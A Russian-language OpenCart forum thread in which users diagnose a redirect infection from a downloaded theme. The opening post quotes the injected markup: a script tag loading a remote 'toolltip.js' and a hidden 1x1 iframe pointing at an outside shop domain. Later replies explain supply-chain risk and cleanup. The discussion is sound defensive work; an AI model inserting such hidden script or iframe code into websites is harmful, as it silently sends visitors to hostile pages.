[Помогите] Вирус на сайте

Тема в разделе "OpenCart", создана пользователем R4an_93, 4 апр 2013.

  1. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    Всем привет!
    Кто сталкивался с темой вирусов на сайте?
    Как их определить и как их лечить?
    Обнаружил на своем сайте скрипт
    <script src="http://hi-shop.googlecode.com/files/toolltip.js" type="text/javascript" language="javascript">

    который подгружает фрейм и после загрузки страницы страницы перекидывает на сайт, который видно в коде фрейма

    <iframe id="dynstuff" width="1" scrolling="no" height="1" frameborder="0" vspace="0" hspace="0" marginheight="0" marginwidth="0" src="http://shopxinh.vn/van-chuyen">

    Версия OC 1.5.3.1. Встретил это совсем недавно, буквально пару часов назад. Сижу за ПК, на котором лицензионный Касперский End Protection, как трипак подхватил на сайт, не понял
     
  2. fanton123

    fanton123

    Регистрация:
    24 дек 2012
    Сообщения:
    256
    Симпатии:
    29
    Это может быть и не вирус. В панели Google посмотри, если там пишет вирус значит вирус.
     
  3. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    вроде ни Яндекс ни Гугл не ругаются на вирусы...
    А кто вообще встречал на сайте вирусы? (я не имею ввиду сторонние) я про свои сайты...как определить вирус, как и кто лечил?
     
  4. nix

    nix php, MySQL, UNIX, MikroTik ROSAPI

    Регистрация:
    16 янв 2013
    Сообщения:
    1.000
    Симпатии:
    889
  5. weber

    weber

    Регистрация:
    7 фев 2013
    Сообщения:
    98
    Симпатии:
    32
    Очень полезный ресурс чтобы узнать на что именно ругается поисковик:
    http://www.unmaskparasites.com/
     
  6. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.155
    Симпатии:
    514
    R4an_93, подхватить можно через дырявые скрипты или утащили пароль из фтп клиента (если вы или кто-то другой его сохранял), также бывает такой код добавляют в нуленные скрипты. Можно скачать архив с хостинга и поискать код на локалке (в тотал коммандере, напр.,) и почистить ручками (если код не в большом кол-ве файлов).
    Вот здесь уже ругались на этот код -
    http://forum.opencart.com/viewtopic.php?t=86101
    Opencart v 1.5.4
    Theme: Fortuna
     
  7. Graund

    Graund

    Регистрация:
    24 мар 2013
    Сообщения:
    132
    Симпатии:
    3
  8. Veles

    Veles

    Регистрация:
    27 янв 2013
    Сообщения:
    212
    Симпатии:
    141
    Яндекс вебмастер и так высветит сообщение если вирус на вашем сайте, как уже кто-то предложил
    AI-Bolit - выход, но лично у меня он не работает, сканирует только сам себя, и заявляет, что всё чики-пуки.
     
  9. marsrip

    marsrip

    Регистрация:
    13 мар 2013
    Сообщения:
    116
    Симпатии:
    55
  10. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    Интересно, а как все же внешне можно определить, что делают вирусы на сайте?
    Может добавляют какие-нить рекламные блоки, кто что видел? может какие то "интересные" вирусы попадались
     
  11. marsrip

    marsrip

    Регистрация:
    13 мар 2013
    Сообщения:
    116
    Симпатии:
    55
    Реклама, поп ап блоки ,редирект на вирусные загрузки и тд и тп .... В основном сечас мало кто работает над похищением кук . В основном цель перенаправить пользователя по нужному адресу .....
     
  12. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    просто изначально появился вопрос изза того, что появилась какая то ява-скрипт библиотека tooltip.js, типа от гугл, которая перекидывала на какой то левый китайский сайт...
     
  13. mtrolik

    mtrolik

    Регистрация:
    7 дек 2012
    Сообщения:
    195
    Симпатии:
    39
     
  14. personash

    personash

    Регистрация:
    27 окт 2012
    Сообщения:
    285
    Симпатии:
    304
    дак это тема fortuna с header.tpl убери ссылку в начале файла и в конце
     
  15. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    Ога, Я уже разобрался что это он, просто пытаюсь понять как этот скрипт туда залез
     
  16. zOrb

    zOrb

    Регистрация:
    1 янв 2013
    Сообщения:
    50
    Симпатии:
    33
    Да он всю жизнь там был=) от в 3 блоках выводится в теле шапке и футтере но tooltip JS нужен для темы..скачай нормальный и замени

    качай тут
     
  17. byob

    byob

    Регистрация:
    14 дек 2012
    Сообщения:
    5
    Симпатии:
    0
    Эта же ерунда была у меня в скачанном тут шаблоне, через некоторое время сайт стал редиректиться на китайский адрес, т.е. некоторое время скрипт выжидал. Просто удалил код скрипта этого и все.
     
  18. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    тож самое было. так это получается вирус...а нормальный tooltip можно и не ставить, так? ) в какой теме он нужен и для чего?
     
  19. byob

    byob

    Регистрация:
    14 дек 2012
    Сообщения:
    5
    Симпатии:
    0
    Не совсем вирус, тут ситуация неуправляемая, виновник - кто выложил шаблон (не обязательно тут на сайте).
    Проблема в чем:
    1 имеем вставку скрипта, который динамически подгружается из неизвестного источника, похожего на google
    2 по началу у нас сам выгружаемый скрипт может быть нормальным
    3 владелец репозитария меняет скрипт на что угодно, вставляет от вируса до рекламного баннера
    4 мы начинаем замечать траблы

    Нужно проверять темы и модули, которые качаем на шару, смотреть все подключения .js и проверять источники, сама по себе ссылка http://hi-shop.googlecode.com/files/toolltip.js подозрительна в этом месте: http://hi-shop....это ж поддомен. Я думаю, что все подобные скрипты нужно скачивать и включать локально, на своем сервере, т.к. на момент проверки сайта может быть все ок, а потом владелец репозитария поменяет код и у нас проблема.
    --- добавлено: Apr 7, 2013 3:24 PM ---
    да, и этот файл совсем не значит, что там будет тултип, просто назвали так, чтоб обмануть бдительность
     
  20. R4an_93

    R4an_93

    Регистрация:
    14 янв 2013
    Сообщения:
    265
    Симпатии:
    30
    Более менее становится все ясно )
    А вообще наличие тестового домена - это конечно всегда здорово. На локальном сервере или нет, тут уже не важно. Самое главное, чтобы, перед тем как залить на рабочий магазин, проверять нужно на тестовом магазине.
    Да и конечно, тестовый домен должен быть 100 % точной копией рабочего